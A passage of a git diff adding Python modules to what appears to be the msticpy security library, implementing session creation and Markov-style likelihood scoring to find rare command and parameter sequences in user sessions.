+        df_with_sesind.sort_values(["session_ind", time_col])
+        .groupby(["session_ind"] + user_identifier_cols, as_index=False)
+        .agg({time_col: ["min", "max"], event_col: list})
+        .reset_index()
+    )
+
+    # rename some columns
+    outer_cols = agg_df.columns.get_level_values(0)
+    inner_cols = agg_df.columns.get_level_values(1)
+    agg_df.columns = [
+        outer_cols[i] + "_" + inner_cols[i] if inner_cols[i] != "" else outer_cols[i]
+        for i in range(len(outer_cols))
+    ]
+
+    # calculate some additional columns
+    agg_df["duration"] = agg_df[f"{time_col}_max"] - agg_df[f"{time_col}_min"]
+    agg_df["number_events"] = agg_df[f"{event_col}_list"].apply(len)
+
+    agg_df = agg_df.drop("session_ind", axis=1)
+    if "index" in agg_df.columns:
+        agg_df = agg_df.drop("index", axis=1)
+
+    # replace dummy_str with nan values
+    for col in user_identifier_cols:
+        agg_df[col] = agg_df[col].replace("dummy_str", np.nan)
+
+    return agg_df
+
+
+# pylint: disable=too-many-locals, too-many-branches
+def create_session_col(
+    data: pd.DataFrame,
+    user_identifier_cols: List[str],
+    time_col: str,
+    max_session_time_mins: int,
+    max_event_separation_mins: int,
+) -> pd.DataFrame:
+    """
+    Create a "session_ind" column in the dataframe.
+
+    In particular, the session_ind column will be incremented each time a new session
+    starts.
+
+    Parameters
+    ----------
+    data: pd.DataFrame
+        This dataframe should contain at least the following columns:
+        - time stamp column
+        - columns related to user name and/or computer name and/or ip address etc
+    user_identifier_cols: List[str]
+        Name of the columns which contain username and/or computer name and/or ip address etc.
+        Each time the value of one of these columns changes, a new session will be started.
+    time_col: str
+        Name of the column which contains a time stamp.
+        If this column is not already in datetime64[ns, UTC] format, it will be casted to it.
+    max_session_time_mins: int
+        The maximum length of a session in minutes. If a sequence of events for the same
+        user_identifier_cols values exceeds this length, then a new session will be started.
+    max_event_separation_mins: int
+        The maximum length in minutes between two events in a session. If we have 2 events for
+        the same user_identifier_cols values, and if those two events are more than
+        `max_event_separation_mins` apart, then a new session will be started.
+
+    Returns
+    -------
+    pd.DataFrame with an additional "session_ind" column
+
+    """
+    max_sep = pd.to_timedelta(max_event_separation_mins, unit="min")
+    max_ses = pd.to_timedelta(max_session_time_mins, unit="min")
+
+    df_with_sesind = data.copy()
+    if not isinstance(df_with_sesind[time_col].dtype, DatetimeTZDtype):
+        df_with_sesind[time_col] = pd.to_datetime(df_with_sesind[time_col])
+
+    final_cols = list(df_with_sesind.columns) + ["session_ind"]
+
+    if len(df_with_sesind) == 0:
+        df_with_sesind["session_ind"] = None
+        return df_with_sesind
+
+    # Sessionising will not work properly with nans. Temporarily replace nan values with dummy_str.
+    for col in user_identifier_cols:
+        df_with_sesind[col] = df_with_sesind[col].fillna("dummy_str")
+
+    df_with_sesind = df_with_sesind.sort_values(
+        user_identifier_cols + [time_col]
+    ).reset_index(drop=True)
+
+    # initialise first row
+    ses_ind = 0
+    df_with_sesind.loc[0, "time_diff"] = pd.to_timedelta(0)
+    df_with_sesind.loc[0, "cml_time"] = pd.to_timedelta(0)
+    df_with_sesind.loc[0, "session_ind"] = ses_ind
+
+    for i in range(1, len(df_with_sesind)):
+        cur = df_with_sesind.iloc[i]
+        prev = df_with_sesind.iloc[i - 1]
+
+        # if any of the user_identifier_cols values change, a new session should start
+        new_flag = False
+        for col in user_identifier_cols:
+            if cur[col] != prev[col]:
+                new_flag = True
+                break
+
+        dif = cur[time_col] - prev[time_col]
+        cml = prev["cml_time"] + dif
+        # if the max session length is exceeded or the max separation between events is exceeded,
+        # a new session should start
+        if dif > max_sep or cml > max_ses:
+            new_flag = True
+
+        if new_flag:
+            df_with_sesind.loc[i, "time_diff"] = pd.to_timedelta(0)
+            df_with_sesind.loc[i, "cml_time"] = pd.to_timedelta(0)
+            ses_ind += 1
+            df_with_sesind.loc[i, "session_ind"] = ses_ind
+        else:
+            df_with_sesind.loc[i, "time_diff"] = dif
+            df_with_sesind.loc[i, "cml_time"] = cml
+            df_with_sesind.loc[i, "session_ind"] = ses_ind
+
+    # replace dummy_str with nan values
+    for col in user_identifier_cols:
+        df_with_sesind[col] = df_with_sesind[col].replace("dummy_str", np.nan)
+
+    return df_with_sesind[final_cols]
diff --git a/msticpy/analysis/anomalous_sequence/utils/__init__.py b/msticpy/analysis/anomalous_sequence/utils/__init__.py
new file mode 100644
index 000000000..19046f1af
--- /dev/null
+++ b/msticpy/analysis/anomalous_sequence/utils/__init__.py
@@ -0,0 +1,10 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""MSTIC Anomalous Sequence Modelling Utilities."""
+
+from ...._version import VERSION
+
+__version__ = VERSION
diff --git a/msticpy/analysis/anomalous_sequence/utils/cmds_only.py b/msticpy/analysis/anomalous_sequence/utils/cmds_only.py
new file mode 100644
index 000000000..333c11c76
--- /dev/null
+++ b/msticpy/analysis/anomalous_sequence/utils/cmds_only.py
@@ -0,0 +1,338 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Helper module for computations when each session is a list of strings."""
+
+from collections import defaultdict
+from typing import Tuple, List, Union, DefaultDict
+import copy
+
+import numpy as np
+
+from ..utils.data_structures import StateMatrix
+from ..utils.laplace_smooth import laplace_smooth_cmd_counts
+from ....common.exceptions import MsticpyException
+
+
+def compute_counts(  # nosec
+    sessions: List[List[str]], start_token: str, end_token: str, unk_token: str
+) -> Tuple[DefaultDict[str, int], DefaultDict[str, DefaultDict[str, int]]]:
+    """
+    Compute counts of individual commands and of sequences of two commands.
+
+    Parameters
+    ----------
+    sessions: List[List[str]]
+        each session is a list of commands (strings)
+        an example session::
+
+            ['Set-User', 'Set-Mailbox']
+
+    start_token: str
+        dummy command to signify the start of a session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of a session (e.g. "##END##")
+    unk_token: str
+        dummy command to signify an unseen command (e.g. "##UNK##")
+
+    Returns
+    -------
+    tuple of counts:
+        individual command counts,
+        sequence command (length 2) counts
+
+    """
+    if not start_token != end_token != unk_token:
+        raise MsticpyException(
+            "start_token, end_token, unk_tokens should all be set to something "
+            "different"
+        )
+
+    seq1_counts: DefaultDict[str, int] = defaultdict(lambda: 0)
+    seq2_counts: DefaultDict[str, DefaultDict[str, int]] = defaultdict(
+        lambda: defaultdict(lambda: 0)
+    )
+
+    for session in sessions:
+        prev = start_token
+        seq1_counts[prev] += 1
+        for cmd in session:
+            seq1_counts[cmd] += 1
+            seq2_counts[prev][cmd] += 1
+            prev = cmd
+        seq2_counts[prev][end_token] += 1
+        seq1_counts[end_token] += 1
+
+    return seq1_counts, seq2_counts
+
+
+def laplace_smooth_counts(
+    seq1_counts: DefaultDict[str, int],
+    seq2_counts: DefaultDict[str, DefaultDict[str, int]],
+    start_token: str,
+    end_token: str,
+    unk_token: str,
+) -> Tuple[StateMatrix, StateMatrix]:
+    """
+    Laplace smoothing is applied to the counts.
+
+    We do this by adding 1 to each of the counts. This is so when we
+    compute the probabilities from the counts, we shift some of the
+    probability mass from the very probable commands and command sequences
+    to the unseen and very unlikely commands and command sequences.
+    The `unk_token` means we can handle unseen commands and sequences of commands.
+
+    Parameters
+    ----------
+    seq1_counts: DefaultDict[str, int]
+        individual command counts
+    seq2_counts: DefaultDict[str, DefaultDict[str, int]]
+        sequence command (length 2) counts
+    start_token: str
+        dummy command to signify the start of a session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of a session (e.g. "##END##")
+    unk_token: str
+        dummy command to signify an unseen command (e.g. "##UNK##")
+
+    Returns
+    -------
+    tuple of StateMatrix laplace smoothed counts:
+        individual command counts,
+        sequence command (length 2) counts
+
+    """
+    # apply laplace smoothing
+    seq1_counts_ls, seq2_counts_ls = laplace_smooth_cmd_counts(
+        seq1_counts=copy.deepcopy(seq1_counts),
+        seq2_counts=copy.deepcopy(seq2_counts),
+        start_token=start_token,
+        end_token=end_token,
+        unk_token=unk_token,
+    )
+
+    seq1_counts_st = StateMatrix(states=seq1_counts_ls, unk_token=unk_token)
+    seq2_counts_st = StateMatrix(states=seq2_counts_ls, unk_token=unk_token)
+
+    return seq1_counts_st, seq2_counts_st
+
+
+# pylint: disable=too-many-arguments, too-many-branches
+def compute_likelihood_window(
+    window: List[str],
+    prior_probs: Union[StateMatrix, dict],
+    trans_probs: Union[StateMatrix, dict],
+    use_start_token: bool,
+    use_end_token: bool,
+    start_token: str = None,
+    end_token: str = None,
+) -> float:
+    """
+    Compute the likelihood of the input `window`.
+
+    Parameters
+    ----------
+    window: List[str]
+        part or all of a session, where a session is a list of commands (strings)
+        an example session::
+
+            ['Set-User', 'Set-Mailbox']
+
+    prior_probs: Union[StateMatrix, dict]
+        computed probabilities of individual commands
+    trans_probs: Union[StateMatrix, dict]
+        computed probabilities of sequences of commands (length 2)
+    use_start_token: bool
+        if set to True, the start_token will be prepended to the window
+        before the likelihood calculation is done
+    use_end_token: bool
+        if set to True, the end_token will be appended to the window
+        before the likelihood calculation is done
+    start_token: str
+        dummy command to signify the start of the session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of the session (e.g. "##END##")
+
+    Returns
+    -------
+    likelihood of the window
+
+    """
+    if use_start_token:
+        if start_token is None:
+            raise MsticpyException(
+                "start_token should not be None, when use_start_token is True"
+            )
+
+    if use_end_token:
+        if end_token is None:
+            raise MsticpyException(
+                "end_token should not be None, when use_end_token is True"
+            )
+
+    w_len = len(window)
+    if w_len == 0:
+        return np.nan
+    prob = 1
+
+    cur = window[0]
+    if use_start_token:
+        prob *= trans_probs[start_token][cur]
+    else:
+        prob *= prior_probs[cur]
+
+    for i in range(1, w_len):
+        prev, cur = window[i - 1], window[i]
+        prob *= trans_probs[prev][cur]
+
+    if use_end_token:
+        prob *= trans_probs[cur][end_token]
+
+    return prob
+
+
+# pylint: disable=too-many-locals, too-many-arguments, too-many-branches
+# pylint: disable=too-many-locals, too-many-branches
+def compute_likelihood_windows_in_session(
+    session: List[str],
+    prior_probs: Union[StateMatrix, dict],
+    trans_probs: Union[StateMatrix, dict],
+    window_len: int,
+    use_start_end_tokens: bool,
+    start_token: str = None,
+    end_token: str = None,
+    use_geo_mean: bool = False,
+) -> List[float]:
+    """
+    Compute the likelihoods of a sliding window of length `window_len` in the session.
+
+    Parameters
+    ----------
+    session: List[str]
+        list of commands (strings)
+        an example session::
+
+            ['Set-User', 'Set-Mailbox']
+
+    prior_probs: Union[StateMatrix, dict]
+        computed probabilities of individual commands
+    trans_probs: Union[StateMatrix, dict]
+        computed probabilities of sequences of commands (length 2)
+    window_len: int
+        length of sliding window for likelihood calculations
+    use_start_end_tokens: bool
+        if True, then `start_token` and `end_token` will be prepended and appended to the
+        session respectively before the calculations are done
+    start_token: str
+        dummy command to signify the start of the session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of the session (e.g. "##END##")
+    use_geo_mean: bool
+        if True, then each of the likelihoods of the sliding windows will be
+        raised to the power of (1/`window_len`)
+
+    Returns
+    -------
+    list of likelihoods
+
+    """
+    if use_start_end_tokens:
+        if start_token is None or end_token is None:
+            raise MsticpyException(
+                "start_token and end_token should not be set to None when "
+                "use_start_end_tokens is set to True"
+            )
+
+    likelihoods = []
+    sess = session.copy()
+    if use_start_end_tokens and end_token:
+        sess += [str(end_token)]
+    end = len(sess) - window_len
+    for i in range(end + 1):
+        window = sess[i : i + window_len]  # noqa: E203
+
+        if i == 0:
+            use_start = use_start_end_tokens
+        else:
+            use_start = False
+
+        lik = compute_likelihood_window(
+            window=window,
+            prior_probs=prior_probs,
+            trans_probs=trans_probs,
+            use_start_token=use_start,
+            use_end_token=False,
+            start_token=start_token,
+            end_token=end_token,
+        )
+        if use_geo_mean:
+            k = window_len
+            lik = lik ** (1 / k)
+
+        likelihoods.append(lik)
+
+    return likelihoods
+
+
+# pylint: disable=too-many-arguments
+def rarest_window_session(
+    session: List[str],
+    prior_probs: Union[StateMatrix, dict],
+    trans_probs: Union[StateMatrix, dict],
+    window_len: int,
+    use_start_end_tokens: bool,
+    start_token: str,
+    end_token: str,
+    use_geo_mean: bool = False,
+) -> Tuple[List[str], float]:
+    """
+    Find and compute likelihood of the rarest window in the session.
+
+    Parameters
+    ----------
+    session: List[str]
+        list of commands (strings)
+        an example session::
+
+            ['Set-User', 'Set-Mailbox']
+
+    prior_probs: Union[StateMatrix, dict]
+        computed probabilities of individual commands
+    trans_probs: Union[StateMatrix, dict]
+        computed probabilities of sequences of commands (length 2)
+    window_len: int
+        length of sliding window for likelihood calculations
+    use_start_end_tokens: bool
+        if True, then `start_token` and `end_token` will be prepended
+        and appended to the session respectively before the calculations are done
+    start_token: str
+        dummy command to signify the start of the session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of the session (e.g. "##END##")
+    use_geo_mean: bool
+        if True, then each of the likelihoods of the sliding windows will be
+        raised to the power of (1/`window_len`)
+
+    Returns
+    -------
+    (rarest window part of the session, likelihood of the rarest window)
+
+    """
+    likelihoods = compute_likelihood_windows_in_session(
+        session=session,
+        prior_probs=prior_probs,
+        trans_probs=trans_probs,
+        window_len=window_len,
+        use_start_end_tokens=use_start_end_tokens,
+        start_token=start_token,
+        end_token=end_token,
+        use_geo_mean=use_geo_mean,
+    )
+
+    if len(likelihoods) == 0:
+        return [], np.nan
+    min_lik = min(likelihoods)
+    ind = likelihoods.index(min_lik)
+    return session[ind : ind + window_len], min_lik  # noqa: E203
diff --git a/msticpy/analysis/anomalous_sequence/utils/cmds_params_only.py b/msticpy/analysis/anomalous_sequence/utils/cmds_params_only.py
new file mode 100644
index 000000000..2f8aa7aa3
--- /dev/null
+++ b/msticpy/analysis/anomalous_sequence/utils/cmds_params_only.py
@@ -0,0 +1,474 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Helper module for computations when modelling sessions.
+
+In particular, this module is for when each session is a list
+of the Cmd datatype with the params attribute set to a set
+of accompanying params.
+"""
+
+from collections import defaultdict
+from typing import Tuple, List, Union, DefaultDict
+import copy
+
+import numpy as np
+
+from ..utils.data_structures import StateMatrix, Cmd
+from ..utils.laplace_smooth import (
+    laplace_smooth_cmd_counts,
+    laplace_smooth_param_counts,
+)
+from ....common.exceptions import MsticpyException
+
+
+# pylint: disable=too-many-locals, too-many-branches
+def compute_counts(  # nosec
+    sessions: List[List[Cmd]], start_token: str, end_token: str
+) -> Tuple[
+    DefaultDict[str, int],
+    DefaultDict[str, DefaultDict[str, int]],
+    DefaultDict[str, int],
+    DefaultDict[str, DefaultDict[str, int]],
+]:
+    """
+    Compute the training counts for the sessions.
+
+    In particular, computes counts of individual commands and of sequences
+    of two commands. It also computes the counts of individual params as
+    well as counts of params conditional on the command.
+
+    Parameters
+    ----------
+    sessions: List[List[Cmd]]
+        each session is a list of the Cmd datatype. Where the Cmd datatype
+        has a name attribute (command name) and a params attribute
+        (set containing params associated with the command)
+        an example session::
+
+            [Cmd(name='Set-User', params={'Identity', 'Force'}),
+             Cmd(name='Set-Mailbox', params={'Identity', 'AuditEnabled'})]
+
+    start_token: str
+        dummy command to signify the start of a session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of a session (e.g. "##END##")
+
+    Returns
+    -------
+    tuple of counts:
+        individual command counts,
+        sequence command (length 2) counts,
+        individual param counts,
+        param conditional on command counts
+
+    """
+    seq1_counts: DefaultDict[str, int] = defaultdict(lambda: 0)
+    seq2_counts: DefaultDict[str, DefaultDict[str, int]] = defaultdict(
+        lambda: defaultdict(lambda: 0)
+    )
+
+    param_counts: DefaultDict[str, int] = defaultdict(lambda: 0)
+    cmd_param_counts: DefaultDict[str, DefaultDict[str, int]] = defaultdict(
+        lambda: defaultdict(lambda: 0)
+    )
+
+    for session in sessions:
+        prev = start_token
+        seq1_counts[prev] += 1
+        for cmd in session:
+            seq1_counts[cmd.name] += 1
+            seq2_counts[prev][cmd.name] += 1
+            prev = cmd.name
+            for par in cmd.params:
+                param_counts[par] += 1
+                cmd_param_counts[cmd.name][par] += 1
+        seq2_counts[prev][end_token] += 1
+        seq1_counts[end_token] += 1
+
+    return seq1_counts, seq2_counts, param_counts, cmd_param_counts
+
+
+def laplace_smooth_counts(
+    seq1_counts: DefaultDict[str, int],
+    seq2_counts: DefaultDict[str, DefaultDict[str, int]],
+    param_counts: DefaultDict[str, int],
+    cmd_param_counts: DefaultDict[str, DefaultDict[str, int]],
+    start_token: str,
+    end_token: str,
+    unk_token: str,
+):
+    """
+    Laplace smoothing is applied to the counts.
+
+    We do this by adding 1 to each of the counts.
+    This is so we shift some of the probability mass from the very probable
+    commands/params to the unseen and very unlikely commands/params. The
+    `unk_token` means we can handle unseen commands, sequences of commands
+    and params
+
+    Parameters
+    ----------
+    seq1_counts: DefaultDict[str, int]
+        individual command counts
+    seq2_counts: DefaultDict[str, DefaultDict[str, int]]
+        sequence command (length 2) counts
+    param_counts: DefaultDict[str, int]
+        individual param counts
+    cmd_param_counts: DefaultDict[str, DefaultDict[str, int]]
+        param conditional on command counts
+    start_token: str
+        dummy command to signify the start of a session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of a session (e.g. "##END##")
+    unk_token: str
+        dummy command to signify an unseen command (e.g. "##UNK##")
+
+    Returns
+    -------
+    tuple of StateMatrix counts:
+        individual command counts,
+        sequence command (length 2) counts,
+        individual param counts,
+        param conditional on command counts
+
+    """
+    cmds: List[str] = list(seq1_counts.keys()) + [unk_token]
+
+    # apply laplace smoothing for cmds
+    seq1_counts_ls, seq2_counts_ls = laplace_smooth_cmd_counts(
+        seq1_counts=copy.deepcopy(seq1_counts),
+        seq2_counts=copy.deepcopy(seq2_counts),
+        start_token=start_token,
+        end_token=end_token,
+        unk_token=unk_token,
+    )
+
+    # apply laplace smoothing for params
+    param_counts_ls, cmd_param_counts_ls = laplace_smooth_param_counts(
+        cmds=cmds,
+        param_counts=copy.deepcopy(param_counts),
+        cmd_param_counts=copy.deepcopy(cmd_param_counts),
+        unk_token=unk_token,
+    )
+
+    seq1_counts_sm = StateMatrix(states=seq1_counts_ls, unk_token=unk_token)
+    seq2_counts_sm = StateMatrix(states=seq2_counts_ls, unk_token=unk_token)
+    param_counts_sm = StateMatrix(states=param_counts_ls, unk_token=unk_token)
+    cmd_param_counts_sm = StateMatrix(states=cmd_param_counts_ls, unk_token=unk_token)
+
+    return seq1_counts_sm, seq2_counts_sm, param_counts_sm, cmd_param_counts_sm
+
+
+def compute_prob_setofparams_given_cmd(
+    cmd: str,
+    params: Union[set, dict],
+    param_cond_cmd_probs: Union[StateMatrix, dict],
+    use_geo_mean: bool = True,
+) -> float:
+    """
+    Compute probability of a set of params given the cmd.
+
+    Parameters
+    ----------
+    cmd: str
+        name of command
+        (e.g. for Exchange powershell commands: "Set-Mailbox")
+    params: Union[set, dict]
+        set of accompanying params for the cmd
+        (e.g for Exchange powershell commands: {'Identity', 'ForwardingEmailAddress'}).
+        If params is set to be a dictionary of accompanying params and values,
+        then only the keys of the dict will be used.
+    param_cond_cmd_probs: Union[StateMatrix, dict]
+        computed probabilities of params conditional on the command
+    use_geo_mean: bool
+        if True, then the likelihood will be raised to the power of (1/K)
+        where K is the number of distinct params which appeared for the
+        given `cmd` across our training set. See Notes.
+
+    Returns
+    -------
+    float
+        computed likelihood
+
+    Notes
+    -----
+    `use_geo_mean` - Some commands may have more params set in general compared with
+    other commands. It can be useful to use the geo mean so that
+    you can compare this probability across different
+    commands with differing number of params
+
+    """
+    pars = params.copy()
+    if isinstance(pars, dict):
+        pars = set(pars.keys())
+    if len(pars) == 0:
+        return 1.0
+    ref = param_cond_cmd_probs[cmd]
+    lik: float = 1
+    for param, prob in ref.items():
+        if param in pars:
+            lik *= prob
+        else:
+            lik *= 1 - prob
+    if use_geo_mean:
+        k = len(ref)
+        lik = lik ** (1 / k)
+
+    return lik
+
+
+# pylint: disable=too-many-locals, too-many-arguments, too-many-branches
+def compute_likelihood_window(
+    window: List[Cmd],
+    prior_probs: Union[StateMatrix, dict],
+    trans_probs: Union[StateMatrix, dict],
+    param_cond_cmd_probs: Union[StateMatrix, dict],
+    use_start_token: bool,
+    use_end_token: bool,
+    start_token: str = None,
+    end_token: str = None,
+) -> float:
+    """
+    Compute the likelihood of the input `window`.
+
+    Parameters
+    ----------
+    window: List[Cmd]
+        part or all of a session, where a session is a list of the Cmd datatype
+        an example session::
+
+            [Cmd(name='Set-User', params={'Identity', 'Force'}), Cmd(name='Set-Mailbox',
+            params={'Identity', 'AuditEnabled'})]
+
+    prior_probs: Union[StateMatrix, dict]
+        computed probabilities of individual commands
+    trans_probs: Union[StateMatrix, dict]
+         computed probabilities of sequences of commands (length 2)
+    param_cond_cmd_probs: Union[StateMatrix, dict]
+        computed probabilities of the params conditional on the commands
+    use_start_token: bool
+        if set to True, the start_token will be prepended to the window
+        before the likelihood calculation is done
+    use_end_token: bool
+        if set to True, the end_token will be appended to the window
+        before the likelihood calculation is done
+    start_token: str
+        dummy command to signify the start of the session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of the session (e.g. "##END##")
+
+    Returns
+    -------
+    likelihood of the window
+
+    """
+    if use_end_token:
+        if end_token is None:
+            raise MsticpyException(
+                "end_token should not be None, when use_end_token is True"
+            )
+
+    if use_start_token:
+        if start_token is None:
+            raise MsticpyException(
+                "start_token should not be None, when use_start_token is True"
+            )
+
+    w_len = len(window)
+    if w_len == 0:
+        return np.nan
+    prob: float = 1
+
+    cur_cmd = window[0].name
+    params = window[0].params
+    param_cond_prob = compute_prob_setofparams_given_cmd(
+        cmd=cur_cmd,
+        params=params,
+        param_cond_cmd_probs=param_cond_cmd_probs,
+        use_geo_mean=True,
+    )
+
+    if use_start_token:
+        prob *= trans_probs[start_token][cur_cmd] * param_cond_prob
+    else:
+        prob *= prior_probs[cur_cmd] * param_cond_prob
+
+    for i in range(1, w_len):
+        prev, cur = window[i - 1], window[i]
+        prev_cmd, cur_cmd = prev.name, cur.name
+        cur_par = cur.params
+        prob *= trans_probs[prev_cmd][cur_cmd]
+        param_cond_prob = compute_prob_setofparams_given_cmd(
+            cmd=cur_cmd,
+            params=cur_par,
+            param_cond_cmd_probs=param_cond_cmd_probs,
+            use_geo_mean=True,
+        )
+        prob *= param_cond_prob
+
+    if use_end_token:
+        prob *= trans_probs[cur_cmd][end_token]
+
+    return prob
+
+
+# pylint: disable=too-many-locals, too-many-arguments, too-many-branches
+def compute_likelihood_windows_in_session(
+    session: List[Cmd],
+    prior_probs: Union[StateMatrix, dict],
+    trans_probs: Union[StateMatrix, dict],
+    param_cond_cmd_probs: Union[StateMatrix, dict],
+    window_len: int,
+    use_start_end_tokens: bool,
+    start_token: str = None,
+    end_token: str = None,
+    use_geo_mean: bool = False,
+) -> List[float]:
+    """
+    Compute the likelihoods of a sliding window in the session.
+
+    Parameters
+    ----------
+    session: List[Cmd]
+        list of Cmd datatype
+        an example session::
+
+            [Cmd(name='Set-User', params={'Identity', 'Force'}),
+            Cmd(name='Set-Mailbox', params={'Identity', 'AuditEnabled'})]
+
+    prior_probs: Union[StateMatrix, dict]
+        computed probabilities of individual commands
+    trans_probs: Union[StateMatrix, dict]
+         computed probabilities of sequences of commands (length 2)
+    param_cond_cmd_probs: Union[StateMatrix, dict]
+        computed probabilities of the params conditional on the command
+    window_len: int
+        length of sliding window for likelihood calculations
+    use_start_end_tokens: bool
+        if True, then `start_token` and `end_token` will be prepended
+        and appended to the session respectively before the calculations
+        are done
+    start_token: str
+        dummy command to signify the start of the session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of the session (e.g. "##END##")
+    use_geo_mean: bool
+        if True, then each of the likelihoods of the sliding windows will
+        be raised to the power of (1/`window_len`)
+
+    Returns
+    -------
+    List[float]
+        list of likelihoods
+
+    """
+    if use_start_end_tokens:
+        if start_token is None or end_token is None:
+            raise MsticpyException(
+                "start_token and end_token should not be set to None when "
+                "use_start_end_tokens is set to True"
+            )
+
+    likelihoods = []
+    sess = session.copy()
+    if use_start_end_tokens and end_token:
+        sess += [Cmd(name=str(end_token), params={})]
+    end = len(sess) - window_len
+
+    for i in range(end + 1):
+        window = sess[i : i + window_len]  # noqa E203
+        if i == 0:
+            use_start = use_start_end_tokens
+        else:
+            use_start = False
+
+        lik = compute_likelihood_window(
+            window=window,
+            prior_probs=prior_probs,
+            trans_probs=trans_probs,
+            param_cond_cmd_probs=param_cond_cmd_probs,
+            use_start_token=use_start,
+            use_end_token=False,
+            start_token=start_token,
+            end_token=end_token,
+        )
+
+        if use_geo_mean:
+            k = window_len
+            lik = lik ** (1 / k)
+        likelihoods.append(lik)
+
+    return likelihoods
+
+
+# pylint: disable=too-many-arguments
+def rarest_window_session(
+    session: List[Cmd],
+    prior_probs: StateMatrix,
+    trans_probs: StateMatrix,
+    param_cond_cmd_probs: StateMatrix,
+    window_len: int,
+    use_start_end_tokens: bool,
+    start_token: str,
+    end_token: str,
+    use_geo_mean=False,
+) -> Tuple[List[Cmd], float]:
+    """
+    Find and compute the likelihood of the rarest window of `window_len` in the session.
+
+    Parameters
+    ----------
+    session: List[Cmd]
+        list of Cmd datatype
+        an example session::
+
+            [Cmd(name='Set-User', params={'Identity', 'Force'}), Cmd(name='Set-Mailbox',
+            params={'Identity', 'AuditEnabled'})]
+
+    prior_probs: Union[StateMatrix, dict]
+        computed probabilities of individual commands
+    trans_probs: Union[StateMatrix, dict]
+         computed probabilities of sequences of commands (length 2)
+    param_cond_cmd_probs: Union[StateMatrix, dict]
+        computed probabilities of the params conditional on the command
+    window_len: int
+        length of sliding window for likelihood calculations
+    use_start_end_tokens: bool
+        if True, then `start_token` and `end_token` will be prepended and appended to the
+        session respectively before the calculations are done
+    start_token: str
+        dummy command to signify the start of the session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of the session (e.g. "##END##")
+    use_geo_mean: bool
+        if True, then each of the likelihoods of the sliding windows will be
+        raised to the power of (1/`window_len`)
+
+    Returns
+    -------
+    Tuple:
+        rarest window part of the session,
+        likelihood of the rarest window
+
+    """
+    likelihoods = compute_likelihood_windows_in_session(
+        session=session,
+        prior_probs=prior_probs,
+        trans_probs=trans_probs,
+        param_cond_cmd_probs=param_cond_cmd_probs,
+        window_len=window_len,
+        use_start_end_tokens=use_start_end_tokens,
+        start_token=start_token,
+        end_token=end_token,
+        use_geo_mean=use_geo_mean,
+    )
+    if len(likelihoods) == 0:
+        return [], np.nan
+
+    min_lik = min(likelihoods)
+    ind = likelihoods.index(min_lik)
+    return session[ind : ind + window_len], min_lik  # noqa E203
diff --git a/msticpy/analysis/anomalous_sequence/utils/cmds_params_values.py b/msticpy/analysis/anomalous_sequence/utils/cmds_params_values.py
new file mode 100644
index 000000000..e28fffc47
--- /dev/null
+++ b/msticpy/analysis/anomalous_sequence/utils/cmds_params_values.py
@@ -0,0 +1,626 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Helper module for computations when modelling sessions.
+
+In particular, this module is for when each session is a list of the
+Cmd datatype with the params attribute set to a dictionary of
+accompanying params and values.
+"""
+
+from collections import defaultdict
+from typing import Tuple, List, Union, DefaultDict
+import copy
+
+import numpy as np
+
+from ..utils.data_structures import StateMatrix, Cmd
+from ..utils.laplace_smooth import (
+    laplace_smooth_cmd_counts,
+    laplace_smooth_param_counts,
+    laplace_smooth_value_counts,
+)
+from ....common.exceptions import MsticpyException
+
+
+# pylint: disable=too-many-locals, too-many-branches
+def compute_counts(  # noqa MC0001  # nosec
+    sessions: List[List[Cmd]], start_token: str, end_token: str
+) -> Tuple[
+    DefaultDict[str, int],
+    DefaultDict[str, DefaultDict[str, int]],
+    DefaultDict[str, int],
+    DefaultDict[str, DefaultDict[str, int]],
+    DefaultDict[str, int],
+    DefaultDict[str, DefaultDict[str, int]],
+]:
+    """
+    Compute the training counts for the sessions.
+
+    In particular, computes counts of individual commands and of sequences
+    of two commands. It also computes the counts of individual params as
+    well as counts of params conditional on the command. It also computes
+    the counts of individual values as well as counts of values conditional
+    on the param.
+
+    Parameters
+    ----------
+    sessions: List[List[Cmd]]
+        each session is a list of the Cmd datatype.
+        Where the Cmd datatype has a name attribute (command name) and
+        a params attribute (dict with the params and values associated
+        with the command)
+        an example session::
+
+            [
+                Cmd(
+                    name='Set-User',
+                    params={'Identity': 'blahblah', 'Force': 'true'}
+                ),
+                Cmd(
+                    name='Set-Mailbox',
+                    params={'Identity': 'blahblah', 'AuditEnabled': 'false'}
+                )
+            ]
+
+    start_token: str
+        dummy command to signify the start of a session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of a session (e.g. "##END##")
+
+    Returns
+    -------
+    tuple of counts:
+        individual command counts,
+        sequence command (length 2) counts,
+        individual param counts,
+        param conditional on command counts
+        individual value counts,
+        value conditional on param counts
+
+    """
+    seq1_counts: DefaultDict[str, int] = defaultdict(lambda: 0)
+    seq2_counts: DefaultDict[str, DefaultDict[str, int]] = defaultdict(
+        lambda: defaultdict(lambda: 0)
+    )
+
+    param_counts: DefaultDict[str, int] = defaultdict(lambda: 0)
+    cmd_param_counts: DefaultDict[str, DefaultDict[str, int]] = defaultdict(
+        lambda: defaultdict(lambda: 0)
+    )
+
+    value_counts: DefaultDict[str, int] = defaultdict(lambda: 0)
+    param_value_counts: DefaultDict[str, DefaultDict[str, int]] = defaultdict(
+        lambda: defaultdict(lambda: 0)
+    )
+
+    for session in sessions:
+        prev = start_token
+        seq1_counts[prev] += 1
